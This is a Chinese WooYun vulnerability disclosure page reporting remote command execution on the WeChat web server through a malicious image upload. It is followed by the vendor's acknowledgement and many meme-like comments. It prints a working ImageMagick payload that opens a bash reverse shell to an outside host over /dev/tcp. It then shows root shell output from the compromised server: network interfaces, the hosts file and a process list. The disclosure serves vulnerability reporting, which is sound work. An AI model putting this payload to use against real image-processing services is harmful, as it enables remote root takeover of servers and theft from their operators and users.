当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0205514

漏洞标题:微信网页版服务器存在远程命令执行漏洞

相关厂商:腾讯

漏洞作者: 猪猪侠

提交时间:2016-05-05 22:47

修复时间:2016-06-24 10:30

公开时间:2016-06-24 10:30

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-05: 细节已通知厂商并且等待厂商处理中
2016-05-10: 厂商已经确认,细节仅向厂商公开
2016-05-20: 细节向核心白帽子及相关领域专家公开
2016-05-30: 细节向普通白帽子公开
2016-06-09: 细节向实习白帽子公开
2016-06-24: 细节向公众公开

简要描述:

微信网页版服务器存在远程命令执行漏洞,root权限,呵呵

详细说明:

#1 存在漏洞服务器地址
https://wx2.qq.com/
#2 与自己聊天发送一个图片

wx.png


#3 payload

push graphic-context 
viewbox 0 0 640 480 
fill 'url(https://"|/bin/bash -i >& /dev/tcp/*.*.*.*/8080 0>&1")'
pop graphic-context

漏洞证明:

#4 获得一个远程SHELL

root@10.54.*.*:~# /sbin/ifconfig -a
eth0      Link encap:Ethernet  HWaddr *.**.**.*
          inet addr:223.167.*.*  Bcast:223.167.*.*  Mask:255.255.255.128
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:207675290974 errors:0 dropped:0 overruns:0 frame:0
          TX packets:381824340869 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:64553957542020 (61563451.3 Mb)  TX bytes:484719339307282 (462264384.5 Mb)
eth1      Link encap:Ethernet  HWaddr *.**.**.**.*
          inet addr:10.54.*.*  Bcast:10.54.*.*  Mask:255.255.255.192
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:79387181028 errors:0 dropped:0 overruns:0 frame:0
          TX packets:233634377039 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:604955868080734 (576930873.9 Mb)  TX bytes:262973934281267 (250791487.0 Mb)
ip6tnl0   Link encap:UNSPEC  HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  
          NOARP  MTU:1460  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:532406147 errors:0 dropped:0 overruns:0 frame:0
          TX packets:532406147 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:14164026742798 (13507868.5 Mb)  TX bytes:14164026742798 (13507868.5 Mb)
sit0      Link encap:IPv6-in-IPv4  
          NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
tunl0     Link encap:IPIP Tunnel  HWaddr   
          NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
root@10.54.*.*:~# cat /etc/hosts
#
# hosts         This file describes a number of hostname-to-address
#               mappings for the TCP/IP subsystem.  It is mostly
#               used at boot time, when no name servers are running.
#               On small systems, this file can be used instead of a
#               "named" name server.
# Syntax:
#    
# IP-Address  Full-Qualified-Hostname  Short-Hostname
#
127.0.0.1     Tencent64.site Tencent64 localhost
# special IPv6 addresses


root      4307     1  0 Apr08 ?        00:00:27 /usr/local/agenttools/agent/agent -c /usr/local/agenttools/agent/client.conf
root      4323     1  0 Apr08 ?        00:00:03 /usr/local/agenttools/agent/agentPlugInD
root      4341     1  0 Apr08 ?        01:37:02 /usr/local/agenttools/agent/base -d5 -c1 -m4 -s /usr/local/agenttools/agent/base.conf
root      4350     1  0 Apr08 ?        00:00:49 /usr/local/agenttools/agent/tcvmstat
root      4449     1  0 Apr08 ?        00:01:49 /usr/local/agenttools/agent/sysddd
root      6234     2  0 Jan18 ?        00:19:57 [flush-8:0]
root      6664     1  0 Jan20 ?        00:00:07 nws-watchdog
root      6665  6664  0 Jan20 ?        07:37:33 nws:http.so,worker_0-2
root      6692     2  0 Jan18 ?        00:04:48 [kjournald]
root      6693     2  0 Jan18 ?        00:05:46 [kjournald]
100       7321     1  0 Jan18 ?        00:00:05 /usr/bin/dbus-daemon --system
root      7341     1  0 Jan18 ?        00:00:01 /usr/sbin/hald --daemon=yes --retain-privileges
root      7682     1  0 15:37 ?        00:00:00 /bin/sh /usr/local/sa/agent/watchdog.sh
root      8028     1  0 15:37 ?        00:00:18 /usr/local/sa/agent/secu-tcs-agent
root      8036     1  0 Jan18 ?        00:00:00 /usr/local/sbin/sshd -f /etc/ssh2/sshd2_config.l
root      8045     1  0 Jan18 ?        00:00:00 /usr/local/sbin/sshd

修复方案:

# 补丁

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2016-05-10 10:29

厂商回复:

非常感谢您的报告,IM组件的问题,已经有白帽子在tsrc平台报告过,此问题我们已经第一时间紧急处理。感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,

最新状态:

暂无

漏洞评价:

评价

  1. 2016-05-05 22:47 | Q1NG ( 普通白帽子 | Rank:148 漏洞数:27 | 临 兵 斗 者 皆 阵 列 前 行 !)

    666666

  2. 2016-05-05 22:48 | T-rex丶Jim ( 普通白帽子 | Rank:140 漏洞数:37 )

    前排

  3. 2016-05-05 22:51 | mango ( 核心白帽子 | Rank:2169 漏洞数:312 | 解决问题的第一步,是要承认问题的存在。)

    666666

  4. 2016-05-05 22:52 | a10ooon3 ( 实习白帽子 | Rank:71 漏洞数:21 | 努力学习,多挖洞。(~˘▾˘)~)

    前排瓜子饮料

  5. 2016-05-05 22:53 | Beep ( 实习白帽子 | Rank:80 漏洞数:5 | 专注PHP漏洞挖掘)

    6666

  6. 2016-05-05 22:55 | 侦探911 ( 普通白帽子 | Rank:164 漏洞数:27 | 学习)

    woc...简直了

  7. 2016-05-05 22:56 | 随风的风 ( 普通白帽子 | Rank:257 漏洞数:96 | 微信公众号:233sec 不定期分享各种漏洞思...)

    简直了。。

  8. 2016-05-05 23:03 | toomi ( 路人 | Rank:12 漏洞数:4 | 小菜一枚)

    简直了

  9. 2016-05-05 23:05 | 鱼化石 ( 实习白帽子 | Rank:93 漏洞数:18 | 介绍不能为空)

    为表感谢,我们申请了一台iPhone6S,请联系我们领取。

  10. 2016-05-05 23:07 | 默之 ( 普通白帽子 | Rank:1615 漏洞数:254 | 沉淀。)

    逆天了!!!

  11. 2016-05-05 23:20 | wkmc ( 路人 | Rank:13 漏洞数:2 | 挖不完的洞洞,补不完的丁丁)

    为表感谢,我们申请了一台iPhone6SSSS ,请联系马化腾领取。

  12. 2016-05-05 23:23 | Sai、 ( 路人 | Rank:14 漏洞数:4 | for fun……)

    猪哥姿势就是多

  13. 2016-05-05 23:28 | Submit ( 普通白帽子 | Rank:565 漏洞数:132 | )

    999

  14. 2016-05-05 23:48 | Mark0smith ( 普通白帽子 | Rank:176 漏洞数:71 )

    666666

  15. 2016-05-06 00:02 | autO_pw ( 实习白帽子 | Rank:81 漏洞数:25 | o_O``)

    6666666666666666666

  16. 2016-05-06 00:07 | jguoguo ( 路人 | Rank:6 漏洞数:2 | test)

    呵呵

  17. 2016-05-06 00:15 | zhighest ( 路人 | Rank:2 漏洞数:2 | ....)

    1 RANK.非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  18. 2016-05-06 00:52 | 指尖上的故事 ( 普通白帽子 | Rank:794 漏洞数:175 | 放手不是我们不合适 | 而是成就你们更适合)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  19. 2016-05-06 05:50 | 玄道 ( 普通白帽子 | Rank:142 漏洞数:42 | 就是注入 就是注入 注入)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  20. 2016-05-06 06:14 | 孤零落叶寒 ( 普通白帽子 | Rank:196 漏洞数:28 | 今天的跌倒是是为了明天更好的站着)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  21. 2016-05-06 07:45 | nick被注册 ( 普通白帽子 | Rank:152 漏洞数:25 | 天一)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  22. 2016-05-06 07:57 | CHai ( 路人 | Rank:1 漏洞数:1 | 萌新。)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  23. 2016-05-06 08:09 | Toom ( 路人 | Rank:6 漏洞数:3 | 啊)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  24. 2016-05-06 08:16 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    1 rank. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  25. 2016-05-06 08:18 | luwikes ( 普通白帽子 | Rank:552 漏洞数:83 | 潜心学习~~~)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  26. 2016-05-06 08:22 | Arthur ( 实习白帽子 | Rank:85 漏洞数:35 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  27. 2016-05-06 08:29 | 永不言弃 ( 路人 | Rank:19 漏洞数:8 | 敏锐者)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  28. 2016-05-06 08:32 | 曾经沧海难为水 ( 路人 | Rank:7 漏洞数:4 | 专业维修核潜艇、反应堆,核弹头翻新,抛光,...)

    RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  29. 2016-05-06 08:40 | tSt ( 普通白帽子 | Rank:109 漏洞数:30 | 在开发里运维最强,运维里网络最强,网络里...)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  30. 2016-05-06 08:44 | 打电话叫人 ( 普通白帽子 | Rank:422 漏洞数:114 | 没事,我打电话叫人)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  31. 2016-05-06 08:47 | 大王派我来巡山-HS ( 路人 | Rank:8 漏洞数:2 | 搞牛奶的渗透玩的比较6的,渗透行业牛奶搞...)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  32. 2016-05-06 08:48 | 屠夫 ( 路人 | Rank:8 漏洞数:3 | 乌云最帅的白帽子)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  33. 2016-05-06 08:48 | 傻强_在路上 ( 路人 | Rank:30 漏洞数:2 | 安全路上小小小小白一枚)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  34. 2016-05-06 08:55 | 风格 ( 实习白帽子 | Rank:37 漏洞数:12 | 注册为白帽子,你可以在这里提交你发现的漏...)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  35. 2016-05-06 08:59 | js2012 ( 普通白帽子 | Rank:126 漏洞数:44 | 闭关修炼。。。)

    你们这样排队真的号码? T_T

  36. 2016-05-06 09:02 | hating ( 路人 | Rank:4 漏洞数:2 | 所有的设备界面皆为前端,纯粹的理性思维归...)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  37. 2016-05-06 09:08 | 土豆俠 ( 路人 | Rank:2 漏洞数:1 | 我爱吃土豆)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  38. 2016-05-06 09:10 | Q1NG ( 普通白帽子 | Rank:148 漏洞数:27 | 临 兵 斗 者 皆 阵 列 前 行 !)

    各位审核大哥,求审核, 感激不尽

  39. 2016-05-06 09:32 | masker ( 路人 | Rank:6 漏洞数:2 | *请输入个人的简要介绍)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  40. 2016-05-06 09:43 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:488 漏洞数:132 | icisaw.cn 超低价虚拟主机VPS 购买返现 支...)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  41. 2016-05-06 09:46 | 陆由乙 ( 普通白帽子 | Rank:620 漏洞数:137 | 我是突突兔!)

    为啥雷没了。

  42. 2016-05-06 10:05 | HADESIDD ( 路人 | Rank:10 漏洞数:4 | 但行好事,莫问前程)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  43. 2016-05-06 10:10 | Mazing ( 路人 | Rank:27 漏洞数:7 )

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  44. 2016-05-06 10:10 | 指尖上的故事 ( 普通白帽子 | Rank:794 漏洞数:175 | 放手不是我们不合适 | 而是成就你们更适合)

    原来那些大站刷爆了的远程执行命令漏洞就是imagemagic啊 啥时候放出exp啊

  45. 2016-05-06 10:11 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:5372 漏洞数:415 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    @陆由乙 有人觉得微信不够屌,不够打雷的标准,就投诉到管理员哪里去了

  46. 2016-05-06 10:31 | 岛云首席鉴黄师 ( 普通白帽子 | Rank:488 漏洞数:132 | icisaw.cn 超低价虚拟主机VPS 购买返现 支...)

    @猪猪侠 我擦,这都能投诉……唉……见不得别人好啊?劣性……

  47. 2016-05-06 10:31 | sol0king ( 路人 | Rank:20 漏洞数:1 | 膜拜大牛)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  48. 2016-05-06 10:42 | 独奏大表哥 ( 路人 | Rank:2 漏洞数:1 | ../)

    RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  49. 2016-05-06 11:01 | 蜀骷卿 ( 实习白帽子 | Rank:53 漏洞数:14 | 爱好互联网,为网络安全做出贡献)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  50. 2016-05-06 11:44 | 深蓝 ( 普通白帽子 | Rank:1174 漏洞数:256 | 我就静静的看着你装逼,我就是不理你。)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  51. 2016-05-06 11:52 | 平安好房电子商务有限公司(乌云厂商)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  52. 2016-05-06 11:53 | AirCrk ( 路人 | Rank:2 漏洞数:1 | 请多指教。)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  53. 2016-05-06 11:53 | scanf ( 核心白帽子 | Rank:1694 漏洞数:237 | 。)

    我擦 雷都没有了 投诉的人什么想法

  54. 2016-05-06 11:54 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    @平安好房电子商务有限公司 TX宣布封杀你的广告。哈哈

  55. 2016-05-06 12:13 | Discover ( 实习白帽子 | Rank:37 漏洞数:15 )

    @指尖上的故事 早放了,星期二就爆了

  56. 2016-05-06 12:14 | Discover ( 实习白帽子 | Rank:37 漏洞数:15 )

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  57. 2016-05-06 12:36 | adminss ( 路人 | Rank:22 漏洞数:19 | 说出来你可能不信,我就是个辣鸡)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  58. 2016-05-06 12:43 | Any3ite ( 路人 | Rank:26 漏洞数:12 | 土耳其web 国内的我就看看不说话)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  59. 2016-05-06 12:44 | Agony ( 路人 | Rank:24 漏洞数:12 | you know a cat has nine lives.)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  60. 2016-05-06 12:49 | gainover 认证白帽子 ( 普通白帽子 | Rank:1805 漏洞数:97 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    @猪猪侠 = =,现在还有这种投诉。。。。

  61. 2016-05-06 12:57 | 过客 ( 实习白帽子 | Rank:42 漏洞数:13 )

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  62. 2016-05-06 13:20 | 浮萍 ( 普通白帽子 | Rank:1077 漏洞数:217 )

    居然还能投诉

  63. 2016-05-06 13:24 | lvalue ( 路人 | Rank:0 漏洞数:1 | hi)

    666666

  64. 2016-05-06 14:47 | Taro ( 普通白帽子 | Rank:349 漏洞数:86 | 走向最远的方向,哪怕前路迷茫;抱着最大的...)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  65. 2016-05-06 17:06 | 秦风 ( 实习白帽子 | Rank:40 漏洞数:10 | 血染江山的画 怎敌妳眉间一点朱砂 覆...)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  66. 2016-05-06 17:12 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  67. 2016-05-06 17:22 | Lykan算什么 ( 路人 | Rank:6 漏洞数:2 | 这家伙太叼,什么都没有留下。)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  68. 2016-05-06 18:06 | wybang ( 普通白帽子 | Rank:199 漏洞数:56 | wybang)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  69. 2016-05-07 07:14 | sysALong ( 普通白帽子 | Rank:464 漏洞数:100 | 在我们黑龙江这噶哒,就没有什么事是【撸串...)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。。

  70. 2016-05-07 12:46 | 小白在闭关 ( 路人 | Rank:10 漏洞数:3 | 安全小白,科研屌丝。)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。。

  71. 2016-05-07 16:15 | Time_泽~少 ( 路人 | Rank:13 漏洞数:9 | 计算机专业/网络安全技术)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  72. 2016-05-07 16:27 | Agony ( 路人 | Rank:24 漏洞数:12 | you know a cat has nine lives.)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  73. 2016-05-07 18:10 | 华不再扬 ( 实习白帽子 | Rank:39 漏洞数:7 | 热爱安全。)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  74. 2016-05-09 09:38 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀,伊雅伊尔哟。)

    卧槽。。。

  75. 2016-05-09 10:23 | 键盘手 ( 路人 | Rank:12 漏洞数:4 | @!@)

    腾讯这是要不吊你们的节奏啊

  76. 2016-05-09 10:37 | prolog ( 普通白帽子 | Rank:944 漏洞数:197 )

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  77. 2016-05-09 11:49 | 土巴兔装修网(乌云厂商)

    是漏洞就承认 就修复,就感谢测试的白帽子,一个厂商的态度必须如此简单高效

  78. 2016-05-09 15:35 | 未了 ( 路人 | Rank:2 漏洞数:3 )

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  79. 2016-05-09 17:00 | 习总夸我好青年 ( 路人 | Rank:2 漏洞数:1 | 刚来的,请多关照)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

  80. 2016-05-09 23:10 | 方大核桃 ( 普通白帽子 | Rank:191 漏洞数:59 | 要怎么长大,才能赢过时间啊)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  81. 2016-05-10 11:22 | 龍 、 ( 普通白帽子 | Rank:474 漏洞数:163 | 你若安好 我就是晴天)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  82. 2016-05-10 11:41 | 举起手来 ( 核心白帽子 | Rank:1957 漏洞数:204 | 准备好,举起手来!)

    @土巴兔装修网 正能量

  83. 2016-05-10 12:08 | 机器猫 ( 普通白帽子 | Rank:1358 漏洞数:291 | 爱生活、爱腾讯、爱网络!一个有梦想的16岁...)

    同样已经被人提交过了为何猪猪侠不忽略呢,因为是猪猪侠?

  84. 2016-05-10 12:27 | 夏雨痕 ( 路人 | Rank:17 漏洞数:7 | 小白不容易啊.)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  85. 2016-05-11 08:57 | 傻强_在路上 ( 路人 | Rank:30 漏洞数:2 | 安全路上小小小小白一枚)

    同样已经被人提交过了为何猪猪侠不忽略呢,因为是猪猪侠?

  86. 2016-05-12 09:37 | 少宇 ( 实习白帽子 | Rank:60 漏洞数:19 | QQ :1126179674 By : 少宇 http://www.90...)

    非常感谢您的报告,IM组件的问题,已经有白帽子在tsrc平台报告过,此问题我们已经第一时间紧急处理。感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈

  87. 2016-05-16 17:16 | 4416 ( 实习白帽子 | Rank:31 漏洞数:10 | 衣来伸手饭来张口2B型泡妞高手!)

    666

  88. 2016-05-17 16:18 | monburan ( 路人 | Rank:6 漏洞数:3 | 对这个世界的知识充满好奇)

    1 RANK. 非常感谢您的报告,此问题已经通过其它渠道得知,目前我们正在处理中,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。